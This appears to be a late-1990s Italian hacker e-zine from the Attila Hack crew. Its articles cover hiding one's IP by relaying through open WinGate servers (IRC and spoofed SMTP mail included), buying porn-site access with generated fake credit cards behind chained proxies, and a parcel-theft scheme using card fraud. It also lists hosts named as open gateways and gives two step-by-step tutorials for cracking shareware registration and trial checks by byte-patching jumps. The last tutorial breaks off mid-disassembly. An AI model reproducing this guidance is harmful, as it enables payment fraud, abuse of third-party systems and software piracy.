||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|

Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





COME ESSERE ANONIMI NEL WEB, SU IRC E QUANDO DECIDIAMO DI MANDARE UNA MAIL



ATTENZIONE: Non utilizzare le informazioni contenute in questo file
per cose illegali: il contenuto e' da ritenersi solo a scopo didattico,
o comunque per uso accettato dalla legge. L'autore non si ritiene
responsabile del cattivo uso delle informazioni qui contenute.


*******************************
ANONIMI NEL WEB/IRC/MAIL
alternativa ai server proxy
*******************************

di /\\ \/ //\\ /
/ \\/\// \\/
threenails /


Premessa: se vi e' mai capitato di dovervi collegare sul Net e avete avuto
la necessita' di restare anonimi (per qualsiasi motivo) e non sapevate come
fare, beh questa e' una guida che possibilmente vi risultera' utile.
Esistono i server proxy ed esiste anche un'alternativa.

Informazioni sui server proxy le trovate sul nostro sito e in migliaia di
altri posti.

Qui parliamo dell'alternativa.

"Introduzione"
L'alternativa e' saltellare di qua' e di la' utilizzando una falla
nel programma WinGate. Ma che e'?
WinGate e' un programma per Win utilizzato nelle LAN per far accedere diversi
computer alla rete per mezzo di un solo modem e di un computer che, come si
dice, fa da gateway, da ponte, diciamo.
E noi che c'entriamo (e soprattutto come ci entriamo)?
Semplice, tale programmino apre una porta 23 (quella standard TELNET) sui
computer in cui e'installato: tramite tale porta e il telnet noi avremo un
account, e tramite questo potremo collegarci da altre parti, spedire email,
usare IRC sempre con l'IP del computer che ci ospita (ah, cosa importante,
spesso questo programma non logga nemmeno chi si collega a lui, quindi
potete stare piu' tranquilli dei proxy, ma comunque e' bene tenere gli occhi
aperti...).

Ovviamente per una maggiore sicurezza(dipende che state facendo...si puo'
saltellare da un gate ad un altro sempre con lo stesso metodo che vi diro'
tra un po': anche se tutti vi loggano, non risaliranno mai a voi, costerebbe
troppo ('troppo' non esiste se siete entrati nel FBI e avete scritto
'IDIOTI' su tutti i loro monitor attivi...).
Ma prima...

"Come li trovo 'sti Gateway?"
Ci sono diversi modi: uno e' beccare un programma che fa lo scan di una serie
di indirizzi IP alla ricerca di WinGate (io utilizzo WinGateScan 2.1 - cercate
e troverete - in caso contattatemi pure): il gioco funziona ed e' pure facile.
Un'altra pssibilita' consiste nel cercare tramite IRC.
Molti server IRC rifiutano le connessioni da parte di WinGates e bannano chi
fa richieste di connessioni di questo tipo: tali rifiuti si chiamano 'g-line'.
Trucco: se scrivete su un programma IRC (mIRC dovrebbe andar bene)

/stats g

vi si dovrebbero fornire una serie di IP con una comunicazione del tipo

"xxx.xxx.xxx.xxx insecure WinGate rejected"

beh, avete trovato i vostri WinGate (ovviamente non potrete utilizzarli
con IRC dal momento che sono stati gia' rifiutati).
Anche utenti bannati con questo messaggio

"Automatically banned for excessive connections"

possono essere possibili WinGate.
Controllate che funzionino bene prima di fare troppo affidamento su di essi.
E mo'?

"Addentriamoci..."
'Telnettate' (che schifo di termine!) nell'IP address prescelto, porta 23,
se vi da' il benvenuto una bella scritta 'WinGate>', beh ci siete, siete
dentro al vostro primo WinGate.
Per saltare ad un altro gate seguite lo stesso procedimento via telnet.
Il tutto si puo' fare anche dal vostro programmino IRC: scrivete

/server xxx.xxx.xxx.xxx 23

e siete sul gate.Dopodiche' collegatevi al vostro server IRC preferito con

/raw irc.fucker.undernet.org

e indicate il vostro nick e il vostro username

/raw nick Away

/raw user Away 0 0 :AwayNET

(Molti programmi IRC potrebbero usare /quote al posto di /raw.)

Allo stesso modo potrete usare questo giochino per mandare mail senza
il vostro IP (perche' lo sapete che e' sempre inserito nell'header delle
vostre comunicazioni, no?).
Basta collegarsi dal WinGate al server di posta nella porta 25 (SMTP) con

mail.fucker.com 25

Per spedire mail, i comandi sono quelli standard dell'SMTP - li sto studiando
quindi o ve li cercate in giro (e se li trovate magari me ne spedite una
copia, grazie) oppure aspettate il mio prossimo articolo sull'argomento.
Orientativamente si dovrebbe scrivere qualcosa di simile:

HELO 'nome del host'
MAIL FROM: 'indirizzo' (non so se questo accetta indirizzi falsi, cosi'
abbiamo risolto il problema della email anonime...)
RCPT TO: 'indirizzo destinatario'
SUBJECT: '...' <-indovinate?

poi tutto quello che volete scrivere...e alla fine

. <- si proprio un punto e poi
QUIT

Provate, fatemi sapere, e se trovate docs su come spedire file in attachment
o informazioni esatte (se queste fossero sbagliate), beh, fatemele avere!


Beh...e' tutto...se questo file vi ha offeso in qualche modo...sorry...o
meglio....fuck you! - l'ho detto, e' solo a scopo educativo....:)

(Questo articolo e' una traduzione approssimativa ed arricchita(spero) di
'Anonymous Hacking' di un certo AlphaVersion - non voglio fare di certo
il lamer e dire che l'ho fatto tutto io!)

AWAY THREENAILS
www.nails.cjb.net
away@softhome.net
!from the Attila Hack crew!






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-




COME HACKERARE I SITI PORNO E ANCHE GUIDA AI SERVER PROXY



Come hackerare un sito porno : by LiQUID



'ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"+- +- +- +- +- +- +- +- +-
'º Come Hackerare i siti porno º-=-=-=-=-=-=-=-=-=-=-=-=-=-
'ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"
°º Powered by [LiQUID] º
Indice: ²ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ1/4
00 Indice ;) °º\ / /$#@ ]
01 Disclaimer ²º \++++++++++/-------/ $#@ ]
02 Teoria °º \ / / $#@ ]
03 Cosa vi serve ²º \ /\ / $#@ ]
04 Toria - 2 parte, i proxy °º \ / \ / $#@ ]
05 Come procedere ²º \ / \ / $#@ ]
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ °º \ / \ / $#@ ]
³ liquido@freemail.it ÃÄÄÄÄÄ1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ]
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Disclaimer
Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto
o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non
promette nulla riguardo il corretto funzionamento di questa semplice tecnica.
Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende
leggendo il testo qui di seguito, fermatevi immediatamente e cancellate
questo sporco pugno di bit dal vostro piccc! ;-P
Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole
situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida
idea di come quello sporco pugno di bit sia finito nel mio picci'!'

Oki, ora che ci siamo chiariti le idee possiamo anche incominciare!


Teoria

La tecnica che spieghero' qui di seguito e' molto semplice. Consiste
nell'entrare in un sito porno, e, trovandoci sbarrata la strada, ci
sentiremo esclusi da dolci immagini :) e non possima entrare se non pagando
quello che potrebbe essere buon prezzo se non fosse gestito da avidi
profittatori. Con la nostra consapevolezza cerchiamo di varcare queste
barriere, poi.......hmm slurp, che belle imaginette ;)

Cosa vi serve
- un picci' monito di monitor, tastiera, mouse, modem, ed account
(anche falso :)) per entrare nella grande rete - si puo' trovare in un
qualsiasi negozio informatico;
- un GenerId, ovvero un generatore di carte di credito false :) - se ne
trova una copia in quasi tutti i siti warez presenti sulla rete (se posso
dare un consiglio, a me piace molto quello del mitico Cavallo de Cavallis,
al sito http://members.tripod.com/~CavallodeCavallis/index.html);
- una buona lista di proxy server anonimi (per verificare se sono veramente
anonimi andate col proxy al sito http://www.anonymizer.com) -
il problema di come trovarli verrà affrontato dopo;
Direi basta.

Teoria - 2 parte, i proxy:

Qui di seguito riportero' una parte dell'Enciclopedia di Lord Shinva,
riguardante i proxy, appunto:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

ANONIMITA' E PROXY
~~~~~~~~~~~~~~~~~~
Cos'e` un proxy? Senza entrare troppo nel dettaglio, si tratta di un server
che vi permette di accedere a un servizio (generalmente WWW ma talvolta anche
FTP, Gopher e altri) senza mostrare il vostro IP address. Infatti, sia che
navighiate sul Web o che effettuiate operazioni via FTP, l'IP rivelato sara`
quello del server proxy anziche` il vostro.

Ma come funziona? Ecco un esempio.
Immaginate di inserire l'indirizzo di un sito web nel vostro browser...
questo contattera` il server contenente le pagine che vi interessano, e le
scarichera` direttamente da li`. Ovviamente il sysadmin del sito avra` il
vostro IP address e molte altre informazioni su di voi (da quale pagina
provenivate, che tipo e versione di browser utilizzavate, ecc).

Se attivate il servizio di proxy, invece, le cose vanno diversamente.
Supponiamo che vogliate collegarvi al sito hacker http://kr0mecorp.home.ml.org
Questo indirizzo verra` mandato al proxy, che vi si colleghera`, scarichera`
la pagina principale e ve la mandera`. L'IP address registrato dal sito
sara` quello del proxy, in quanto e` stato il proxy server a collegarsi al
sito, non voi ;)

Come si configura un browser per utilizzare il proxy? E` presto detto.
Vi faro` un esempio per Netscape (Navigator o Communicator). Se utilizzate
Micro$oft Explorer non vi spieghero` come fare... passate a Netscape o
arrangiatevi... la roba della Micro$oft e` SEMPRE spazzatura.

Dal menu` preferences di Netscape selezionate advanced e poi proxies, quindi
manual proxy configuration e poi il bottone view. Ora potrete inserire nella
prima riga (HTTP) il nome del server proxy e poi la porta.
Noterete che ci sono altre caselle libere: FTP, Gopher, ecc. Se il proxy
server supporta quei servizi, inserite nome del server e porta nelle
rispettive locazioni e potrete accedere anonimamente anche a quei servizi.

Ora siete pronti per navigare, e cio` avverra` in modo trasparente sia per
voi che per la macchina alla quale vi collegate.

Se volete usare un proxy FTP, probabilmente vorrete utilizzare un client
come CuteFTP oppure WS-FTP, anziche` il browser... le operazioni per
configurare tali client sono molto simili, basta trovare il menu` di
configurazione e inserire nome e porta del proxy da utilizzare.
Niente di piu`.

Bene, ora sappiamo come utilizzare i proxy... ma dove possiamo reperirne
uno funzionante da utilizzare?

Il metodo che vado ad illustrarvi e` quello che uso io e che si e` rivelato
efficace nella maggior parte dei casi.

Buona parte dei server proxy hanno un nome che inizia con "proxy." (ad
esempio proxy.pingnet.ch) oppure con "cache" (o "wwwcache" o "webcache"),
e utilizzano come numero di porta uno dei seguenti: 3128, 8000, 8001, 8080,
80, 81, 800 (e raramente varianti di questi).

Basandoci su queste considerazioni, trovare i proxy e` quindi semplicissimo:
prendete un host qualsiasi, meglio se vi sta antipatico, tipo il Berlusconiano
www.mediaset.it oppure www.leganordsen.it (sito web del re assoluto dei
cretini e degli ignoranti) e trasformate l'host name in un possibile nome
"da proxy", ad esempio proxy.leganordsen.it (ovviamente non provate questo,
e` probabile che un sito di merda come quello della Lega Nord non abbia
neanche un proxy...). A questo punto dovrete utilizzare uno dei numeri di
porta elencati sopra.

Prima di sperimentare tutte le porte, vi converra` controllare che il proxy
esista. Potete farlo in due modi: o utilizzate l'utility Ping oppure provate
a navigare dopo aver configurato il proxy... se comparira` la finestra di
errore di netscape, l'host non esiste. Se invece lo status indica "contacting
host proxy.xxxxx.com..." troppo a lungo, vuol dire che la porta non e` quella
esatta; cambiatela e riprovate.

Avrei molti proxy da elencarvi, ma dato che i rispettivi sysadmin si
accorgerebbero dell'improvviso... incremento di utenza ;) diventerebbero
presto inutili. Trovarli e` comunque, come avete avuto modo di vedere, un
processo estremamente semplice e potrebbe facilmente essere automatizzato,
creando uno scanner che faccia da solo il lavoro, magari scritto in Perl...
Ricordate, *qualunque* host va bene, italiano o straniero, grande o piccolo,
di importanti societa` o piccoli providers. Talvolta non troverete il
proxy... beh, ci sono tanti altri siti da provare ;)
Fate una ricerca per una parola qualsiasi su un motore di ricerca, ed eccovi
tutti i server di cui avete bisogno.... centinaia di migliaia.
Oppure utilizzate la ricerca avanzata di Altavista e cercate i server che
iniziano per "proxy." ... le possibilita` sono infinite.

Tenete presente che anche i proxy server registrano il vostro IP address,
quindi non fate stupidaggini. Se proprio volete un maggiore grado di
sicurezza, concatenate i server in questo modo:

http://primo_proxy:porta/http://secondo_proxy:porta/http://www.sito.com/

Piu` lunga e` la catena, piu` difficile sara` rintracciarvi, specie se uno
dei siti della catena cancella i log di accesso piu` frequentemente degli
altri (e non e` una cosa rara... ;)).

Un'ultima parola va detta sui wingates. Wingate e` un software che permette
di condividere un collegamento a internet da molti pc. Peccato solo che non
abbia nessuna password di protezione ;) e cosi` chiunque si colleghi a un
server che ha wingate in funzione possa usare quel server come se fosse un
proxy, e per giunta senza neanche lasciare la benche` minima traccia!

Per trovarli, prelevate uno scanner di wingate da internet nel solito modo:
collegatevi (ad esempio) a www.altavista.digital.com e cercate le parole
"wingate scanner". Troverete molti siti dai quali scaricare uno scanner.
Usate lo scanner su vari servers fino a trovare qualche wingate funzionante.
Eccovi una lista, che pero` probabilmente sara` presto inutile per le ragioni
spiegate sopra per i proxy:

www.este.net
mrenner.bevc.blacksburg.va.us
netgate.maret.org
pc300057.multiweb.net
cda-bitclub.netbusiness.it
dyn.ml.org
chamail.ozemail.com.au
sandbox.pacificnet.net
michae3.lnk.telstra.net
pmzproxy.pmz.com
showcad.demon.co.uk

Una volta in possesso di qualche sito potete collegarvi alla porta 23 per
accedervi. Informazioni dettagliate le trovate su http://demoniz.bikkel.com
E... si, sono in INGLESE.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Per semplificarvi la vita (hihihihihihihi, ora ce lo dici ;)))))) lo schema
proxy e' questo:

Io senza proxy:
ÚÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿
³ IO ³-=-=-=-=-=-=-=-=-=-=-³ PoRN4Zz0 ³
ÀÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ

Io col Proxy
ÚÄÄÄÄ¿ ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿
³ IO ³-=-=-=-=-=-³ Pr0XY ³-=-=-=-=-=-³ PoRN4Zz0 ³
ÀÄÄÄÄÙ ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ


Come Procedere

Allora ragazzi, arrivati al vostro bel pornazzo, entrate nella sezione
dedicata al pagamento, inserite il vostro bel numero di fake cc (credit card)
aspettate la passwd, e slurp! Guardate bene bene il vostro sitazzo e
rifatevi gli occh ;)))))

Ma voi mi chiedere perche' tutta quella noisissima storia sui proxy??
La risposta e' questa:
Se io senza proxy mi collego al sito, e commetto un atto illegale (cc fake),
il mio ip compare sui log del sito, ma se io uso 1 proxy......l'ip che
appare e' quello del server proxy :)))))))))))))) Io vi consiglio di usare
piu' proxy, in modo da essere meno raggiungibile e piu' nascosti ;-P
Ed ora ragazzi.........RIFATEVI GLI OCCHI!!!!!!!
La rete e' piena di siti xxx, girate e girate!!!!!!!!!

by [LiQUID]
liquido@freemail.it

PS= Ricordo che questa tecnica pu• essere applicata in moltissimi altri campi,
per esempio come farsi un account falso, dando la fake cc al servizio on-line
della tin, oppure se avete una voce seria potete anche fare telefonate di
questo genere:

io > Scusi vorrei acquistare un vostro prodotto con carta di credito
centralino > va benissimo, mi dica il numero
io > ok, xxxxxxxxxxxxxxx
centralino > ok
io > ma signorina, io lavoro, ci sono solo alle 3 del pomeriggio
centralino > ok, mi dica l'indirizzo
io > via xxxxxxxxxxxxxx
centralino > ok

alle 3 del pomeriggio vai all'inirizzo del tuo nemico, e appena arriva il postino
ritiri tu il pacco :)))))

ciao raga!!!!!!!!!!





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


01010011 01100101 01111010 01101001 01101111 01101110 01100101 BoBo & LaNdo
01000011 01110010 01100001 01100011 01101011 01101001 01101110 01100111

Hahaha solo un vero craccatore può capire cosa c'è scritto qua:) Mi sono proprio divertito
a scriverlo, grazie molte b0nu$ per i tuoi tute, hai visto che a qualcosa sono serviti????
Hehehe adesso scrivo in codice binario :))

BoBo





FIRST CRACK: by Away



Tutorial: Cracking by Example : CRACKING DI PROGRAMMI PER WINDOWS
by /\ \ \/ / /\ \ /
/\/\ \/\/ /\/\ \/ , 22 7 99
THREE NAILS /

"This is the first step
your soul will take
up to the sky..."
da "Divine Step" - Coroner
-----------------------------------------------

Needs : WinDASM 32 (disassemblatore)
(va bene anche il SoftICE)
HexEditor (editor esadecimale)
(anche un qualsiasi altro editor hex)
Kawa 2.51 (il programma da crackare)

-----------------------------------------------
Prima di iniziare:
Beh, sono le mie prime esperienze da cracker, quindi scusate possibili
idiozie(e magari qualche correzione da chi ne sa di più potrebbe non fare
schifo ... un'email e il gioco è fatto), o la banalità di certe cose,
ma è un tutorial tanto per iniziare, facile facile, niente
di impegnativo...insomma se vi fa schifo OR vi serve qualcosa di più
'professionale' passate ad altro...


Va beh, si comincia:
Kawa è un IDE per Java che avevo installato
tempo fa nel mio computer per un progetto: ma che succede?
A metà progetto circa, il signor Kawa mi dice
"Ehi, il tuo tempo è scaduto! Comprami!" - Vaffanc*lo!
Ci devo lavorare io, che serietà del ca**o(!)!!! :)
Così mi armo di qualche programma utile trovato in giro
nella grande ragnatela (sono shareware, registrati...ma
nel nostro caso vanno bene anche se non sono registrati)
e di un pò di pazienza.

L'idiozia media dei programmi shareware sta nel fatto di
chiedervi la password per registrarsi e, in caso di password
errata, di far apparire una finestra che ti avverte dell'errore.
Aha!!!!!! Il 99% dei programmi usa una finestra di messaggio
standard, sta nella libreria API di Win e si chiama MessageBox().

Deduzione logica: all'interno del codice del programma, da
qualche parte, quasi sicuramente vicine ci sono le funzioni
di controllo della password e la chiamata alla API MessageBox()
(se non sono proprio vicine, ci sono vicine le chiamate
a due pezzi di codici che fanno le due cose - chi ha fatto il
programma è furbo(!?), ha fatto procedure separate, ma a noi
poco importa, no? - in ogni caso un pò di pratica e un minimo
di conoscenza di assembler non guasta...).

Passo Uno: disassemblare il programma con il WinDASM32,
otterremo il suo listato in assembly, non preoccupatevi, non
dovete conoscere il linguaggio, vi bastano sapere un paio di
cose di cui parlerò tra un pò.
Cerchiamo la chiamata al MessageBox() che ha come parametro
la stringa che ci appare per avvisarci della password errata
- guardare un pò come funziona il WinDASM32, c'è il file di help,
è molto semplice e questo non è un tutorial su come si usa il WD32
- e diamo un'occhiata al codice lì intorno...

Ehi, ma cos'è quello? un confronto tra variabili (CMP o TEST)
e un salto se sono uguali (JE). Vi suggerisce qualcosa?

Possibile che le due variabili contengano il codice da noi
inserito a caso e quello funzionante? Naaaa, trooppo facile...
Proviamo.
Però ricordatevi che lavoriamo con eseguibili, quindi non si deve
inserire codice assembly, ma direttamente codice macchina.
C'è da conoscere l'opcode (equivalente in linguaggio macchina)
relativo alle varie istruzioni: la tabella successiva fornisce
ciò di cui abbiamo bisogno:

Istruzione Opcode

JA rel8 77 cb
JAE rel8 73 cb
JB rel8 72 cb
JBE rel8 76 cb
JC rel8 72 cb
JCXZ rel8 E3 cb
JE rel8 74 cb - salta se uguali
JG rel8 7F cb
JGE rel8 7D cb
JL rel8 7C cb
JLE rel8 7E cb
JNA rel8 76 cb
JNAE rel8 72 cb
JNB rel8 73 cb
JNBE rel8 77 cb
JNC rel8 73 cb
JNE rel8 75 cb - salta se non sono uguali
JNG rel8 7E cb
JNGE rel8 7C cb
JNL rel8 7D cb
JNLE rel8 7F cb
JNO rel8 71 cb
JNP rel8 7B cb
JNS rel8 79 cb
JNZ rel8 75 cb
JO rel8 70 cb
JP rel8 7A cb
JPE rel8 7A cb
JPO rel8 7B cb
JS rel8 78 cb
JZ rel8 74 cb

JMP rel8 EB cb - salta in ogni caso
JMP rel16 E9 cw
JMP rm16 FF /4
JMP ptr16:16 EA cd
JMP m16:16 FF /5

Il vostro neurone preferito ha iniziato ad agitarsi? Si?
Ok, annotatevi l'offset del punto del programma che ci interessa
(il punto a partire dall'inizio in cui c'è l'istruzione da
modicare).
Aprite il Kawa.exe con l'HexEditor,
saltate al punto con GOTO x e che trovate?
74xx vii ricorda JE? Geniale...
Lo cancelliamo, e che inseriamo al suo posto?
Come avete detto, EBxx ? Ma dai, non mi dite...
Dopodichè salviamo e proviamo il programma, registriamoci(o
almeno facciamo il tentativo...) e che succede?
Il programma esce?
Possibile ->> abbiamo sbagliato controllo (quel CMP fa un'altra
cosa, capita...): beh che si fa? Ricominciamo con quell'altro CMP
là vicino...stesso procedimento e poi di nuovo prova.
(ricordatevi però prima di rimettere a posto quella modifica inutile
- potresti rendere il programma inutilizzabile - stessa cosa se
provando il programma, non funziona, avete cambiato qualcosa
che non si doveva toccare...)

Come dite, il programma adesso si prende qualsiasi password e
parte correttamente? beh, è tutto, avete crackato il vostro primo
programmino (magari non proprio da soli...), now be happy...

Tutto ok?

Questo è tutto, fate pratica con altri programmi, e se funziona
allora forse questo tutorial vi è servito a qualcosa.
Consiglio inoltre di downloadare il tutorial di Xoanon - lo trovate
in giro - anche nel sito di Attila_Hack
(è molto interessante - bravo Xoanon!)
"We are the voice.
Do not shut us out."

A W A Y T H R E E N A I L S
from the Attila_Hack Crew
away@softhome.net








+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





COME CRACCARE MA QUANTO MI COSTI 3.0: by Ritz


*******************************
* *
* Ma Quanto Mi Costi 3.0 *
* *
* by Ritz *
* *
*******************************

BEST VIEWED WITH M$-d0$ 3D1T0R

******************************************************************************
DESCLAIMER LEGALE:
Ascoltatemi bene prima di leggere questo articolo: esso Š stato scritto a PURO
scopo DIDATTICO: io, Ritz, non incoraggio chi volesse servirsene per scopi
illegali; inoltre non mi assumo alcuna responsabilit... se vi autodistruggete i
progammi. CAPITTOOOO?!
******************************************************************************


Ciao a tutti! Io mi chiamo Ritz, e in questo tute cercher• di spiegare la
sprotezione di un programma che non offre alcuna possibilit… di
registrazione (o almeno io non l'ho trovata... :-) ). Di conseguenza, l'unica
cosa da fare sar… forzare il codice in alcuni punti. Dopo aver fatto ci•,
sar… inoltre necessario togliere un fastidioso nag-screen iniziale.

Il proggy si trova in varie riviste informatiche o al sito:
www.space.tin.it/internet/apizzegh e funge da contascatti per Internet.

OK... tutti pronti? S? Perfetto... sigaretta, Martini Dry, VIA! SE PARTE!!

Allora, installato il programmillo? Perfetto... avviatelo: cercare ora un
men- tipo About/Register. Azz, non c'Š, provate ora a guardare l'iconetta del
Systray: clic destro, scegliete "Informazioni su MQMC32", vi apparir… un
menu... okkakkio, nemmeno l si pu• mettere il serial... come si fa? Beh,
evidentemente il programma Š uno di quelli che dopo 30 gg. si suicidano e
basta. Quindi? Semplice... chiudete l'icona del Systray, portate avanti la
data di 4-5 mesi, riavviate il prog... e, eccovi apparire il messaggio che
vi dice che non lo potete pi- avviare perchŠ il periodo di valutazione Š
scaduto. Male, molto male. Bisogna lavorarci un po' su, che ne dite?

Allora, innanzi tutto bisogna far s che il prog. possa essere avviato...
proviamo quindi a intercettare la funzione che manda il nag iniziale...
CTRL+D per poppare nel Sice, quindi bpx messageboxa. Usciamo con CTRD+D,
riavviamo tutto, e... kakkio il debugger non poppa prima della messagebox...
perchŠ mai? Se avete notato, quando il messaggio appare il PC fa un "beep",
vero? Bene, allora proviamo a cambiare il BPX con un messagebeep: togliete
l'iconetta del MQMC dal Tray, entrate nel Sice, scrivete bpx messagebeep,
uscite, avviate il MQMC, e, voil..., il vostro debugger preferito fa la sua
comparsa!! Usciti dalla funzione con F11, dovreste attraccare qui:

:0048A202 PUSH 32

S? Perfetto! Adesso cancellate tutti i bpx del Sice con bc *, aprite il
vostro W32dasm, disassemblate il file mqmc32.exe... bzzzzzzzzz....zzzzzz...
bzzzzzzzz. Finito!! Ora andate nel menu Search/Find text, scrivete :0048A202,
aspettate un po'... e dovreste arrivare a questo punto:

* Possible StringData Ref from Code Obj ->"10474"
|
:0048A1D9 mov edx, 0048A63C
:0048A1DE call 00403F04
:0048A1E3 jne 0048A228 <-- Jump importante... servir... un po' pi- avanti.
:0048A1E5 mov eax, dword ptr [0049C244]
:0048A1EA cmp dword ptr [eax], 00000000
:0048A1ED je 0048A1FB
:0048A1EF mov eax, dword ptr [0049C244]
:0048A1F4 mov eax, dword ptr [eax]
:0048A1F6 call 00430A74

* Jump at Address:
|:0048A1ED(C)
|
:0048A1FB push 00000000

* Reference To: user32.MessageBeep, Ord:0000h
|
:0048A1FD Call 00406C9C
:0048A202 push 00000032
:0048A204 mov cx, word ptr [0048A644]
:0048A20B mov dl, 02


* Possible StringData Ref from Code Obj ->"MQMC323.0"
|
:0048A20D mov eax, 0048A650
:0048A212 call 00444C24
:0048A217 mov eax, dword ptr [0049C28C]
:0048A21C mov eax, dword ptr [eax]
:0048A21E call 00432A34
:0048A223 jmp 0048A5A7

* Jump at Address:
|:0048A1E3(C)
|
:0048A228 8D4DB0 lea ecx, dword ptr [ebp-50]


Allora... analizziamo il codice... in 48A1FD c'

  
Š la call del nag-screen...
osservando ora 48E1ED si vede un JE... Jump if Equal... cambiandolo in JMP
si salterebbe la CALL a 41A8F6... implicata probabilmente nel suicidio del
programma dopo il suo avvio. Dunque, segnatevi l'OFFSET di 48E1ED: dovrebbe
essere 895ED... bene, fatevi una copia di MQMC.exe e lasciatela nella stessa
cartella, aprite Hiew, caricate la copia, premete F4, scegliete Decode, poi
F5, scrivete l'OFFSET, premete INVIO, quindi F3 per cambiare il byte 75 in
EB (jump incondizionale), F9 per aggiornare lo schermo, F10 per uscire. Ora
dalla cartella del MQMC caricate la copia (quella taroccata), e vi apparir...
ancora il nag (questo era previsto), ma, se cliccate OK, il prog PARTE!! Lo
avete crackaaatooo. Se ci siete riusciti, complimenti, altrimenti rileggetevi
tutto daccapo...

Ora per• c'Š un piccolo problema teknico: il nag-screen che rompe le palle:
uhm... vediamo che se po' fa'.

Vedete la call a 48A1FD? Quella sar... la routine da fottere: infatti, Š
proprio quella che richiama la Message Box. Fateci doppio clic col topo e in
mezzo alla barra dei pulsanti del Dasm dovrebbe "accendersi" una scritta:
CALL. Cliccateci sopra. (* Cazzo mi si sta inkiodando il Winkaz... 67%
risorse disponibili... pork putt meglio riavviare... schiusatemi un attimo...
torno subito, il mio Celeron overclokkato tra un po' si fonde... OK ho
riavviato... ora mi sento pi- tranquillo... ripartiamo*). Avete cliccato
sulla CALL? Bene, allora ora vi trovate qui:

* Referenced by a CALL at Addresses:
|:00455B69 , :00455E97 , :00458189 , :00461087 , :004612F6
|:00461326 , :0046A09B , :0046A100 , :0046ABB4 , :0046AC3D
|:0046ACAF , :0046AD10 , :0046AD71 , :0046ADDE , :0046B8A6
|:0046B909 , :0047E62A , :00484B80 , :00484F17 , :0048A1FD
|:0048A3AE , :0048A42F , :0048D945 , :00491AA1 , :004922CD
|:00492AC6 , :0049328D
|

* Reference To: user32.MessageBeep, Ord:0000h
|
:00406C9C Jmp dword ptr [0049F66C]
:00406CA2 mov eax, eax


In teoria ora bisognerebbe fare un lavoretto, ovverosia (WOW!) spulciare
OGNUNO degli indirizzi sopra... fate una prova: andate a :00455E97. Due righe
pi- in altro vedrete un jne che, se eseguito, SALTA COMPLETAMENTE VIA la call.
Ecco quindi che bisognerebbe cambiarlo in JMP. Tornate ora a :00406C9C;
capito cosa dovete fare? Andare in OGNUNA dlle CALL sopra, trovare i JUMP che
le saltano e cambiarli in JMP incondizionali... il problema Š che non tutte
tali call sono necessarie, anzi, e inoltre alcune, come ad esempio la prima
(:00455B69), non hanno jump che le possano evitare nei dintorni... insomma,
un casino... ecco perchŠ ho deciso di dirvi io direttamente quali sono quelle
su cui agire (vi pensate che lavorazzo ho fatto?!): l'importante Š che voi
capiate il concetto per poi poterlo applicare nelle varie occasioni.

Andate in :0048A1FD. Vi troverete nel codice visto all'inizio: ecco a cosa
serve il jne a :0048A1E3!!! E' uno di quelli che fottono la CALL!! Infatti
se eseguito il proggy salta pi- avanti!

Ora posteggiate il kulo in :0048A3AE. Sarete qui:

* Possible StringData Ref from Code Obj ->"0003"
|
:0048A321 mov edx, 0048A728
:0048A326 mov eax, dword ptr [ebx+00000220]
:0048A32C call 0045FA70
:0048A331 lea edx, dword ptr [ebp-50]
:0048A334 lea eax, dword ptr [ebp-40]
:0048A337 call 00404C0C
:0048A33C mov eax, dword ptr [ebp-40]
:0048A33F lea ecx, dword ptr [ebp-3C]
:0048A342 mov edx, 00000004
:0048A347 call 00489D84
:0048A34C mov ecx, dword ptr [ebp-3C]
:0048A34F lea eax, dword ptr [ebp-38]
